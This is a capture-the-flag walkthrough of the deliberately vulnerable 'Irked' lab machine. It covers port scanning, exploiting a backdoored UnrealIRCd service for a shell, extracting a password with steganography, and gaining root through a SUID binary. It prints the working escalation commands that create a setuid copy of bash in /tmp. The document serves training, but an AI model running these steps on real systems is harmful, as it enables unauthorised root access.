Summary

Irked is an easy Linux box. It can be exploited by properly enumerating the box and finding that it is running a vulnerable version of UnrealIRCd. This can be exploited with a python script which will provide the initial shell. To obtain low level privileges you will need to use steganography extraction techniques to find the hidden text file from the landing page image. After this you can exploit a SUID process that executes a non existing bash file from /tmp.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
45936/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

The webserver contained the following image:

Apart from this, not much interesting was found. The only slightly useful thing to obtain from the webserver was that apache was running:

http://10.129.1.108/manual (Status: 301)
http://10.129.1.108/server-status (Status: 403)

So, the final 4 ports are of interest. It is running UnrealIRCD according to Nmap. Searchsploit finds the following vulnerabilities for this software:

searchsploit unrealircd
------------------------------------------------------------------------------------------
 Exploit Title                                                                                                                                                              |  Path
---------------------------------------------------------------------------------------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                                                                                | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                                                                                     | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                                                                                              | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                                                                                                   | windows/dos/27407.pl
------------------------------------------------------------------------------
Shellcodes: No Results

Exploitation

So it seems Metasploit has a command execution script. When you google for UnrealIRCd explots you will find this one. When modifying the script accordingly, you will obtain an initial shell as ircd:

ircd@irked:~/Unreal3.2$ hostname && whoami
hostname && whoami
irked
ircd

When you run a find command, you will notice that the user.txt is not in the regular Desktop directory. This should raise some flags already.

ircd@irked:~$ find / -name "user.txt" 2>/dev/null
/home/djmardov/Documents/user.txt

As you can see below, we don’t have permissions to read this file:

ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

The file that we do have access to is .backup. It contains this:

ircd@irked:/home/djmardov/Documents$ cat .backup 
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

I didn’t quite realise ‘steg’ is a reference to steganography.

Steganography is the technique of hiding secret data within an ordinary, non-secret, file or message in order to avoid detection; the secret data is then extracted at its destination.

If you did get this reference you will have known it has to do with the picture on the homepage we saw earlier. Let’s inspect that. First download the image with wget:

wget http://10.10.14.147/irked.jpg

Then lets analyse it with steghide:

steghide info irked.jpg 
"irked.jpg":
  format: jpeg
  capacity: 1.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "pass.txt":
    size: 17.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

Now you should have a password from the pass.txt:

cat pass.txt
Kab6h+m[...]

Now you can su to the djmardov user and you will have access to the user.txt.


Privilege Escalation

The output from lse.sh is very useful in this case. It contained this:

[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/X
/usr/bin/viewuser

These are both very uncommon. Lets check the first one:

/usr/bin/X
X: user not authorized to run the X server, aborting.

This doesn’t really provide any information. However, the latter does:

/usr/bin/viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-04-06 14:42 (:0)
sh: 1: /tmp/listusers: not found

We cannot edit this file directly but we do observe it wants to execute a file listusers with bash in the tmp directory that doesn’t exist. Let’s create it with the following contents:

djmardov@irked:/tmp$ cat > listusers
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash
djmardov@irked:/tmp$ chmod a+x listusers

This is known as the rootbash method. Don’t forget to change the permissions so that root can actually execute this file. When you re-run the executable, it will create a file rootbash in tmp:

Now you can become root by executing:

/tmp/rootbash -p

Conclusion

Apart from the steganography, I found this a very enjoyable box. I’m personally not so interested in steganography but since the difficulty was quite easy this was one was alright. The other exploitation techniques are relatively straightforward. Hope you enjoyed this writeup!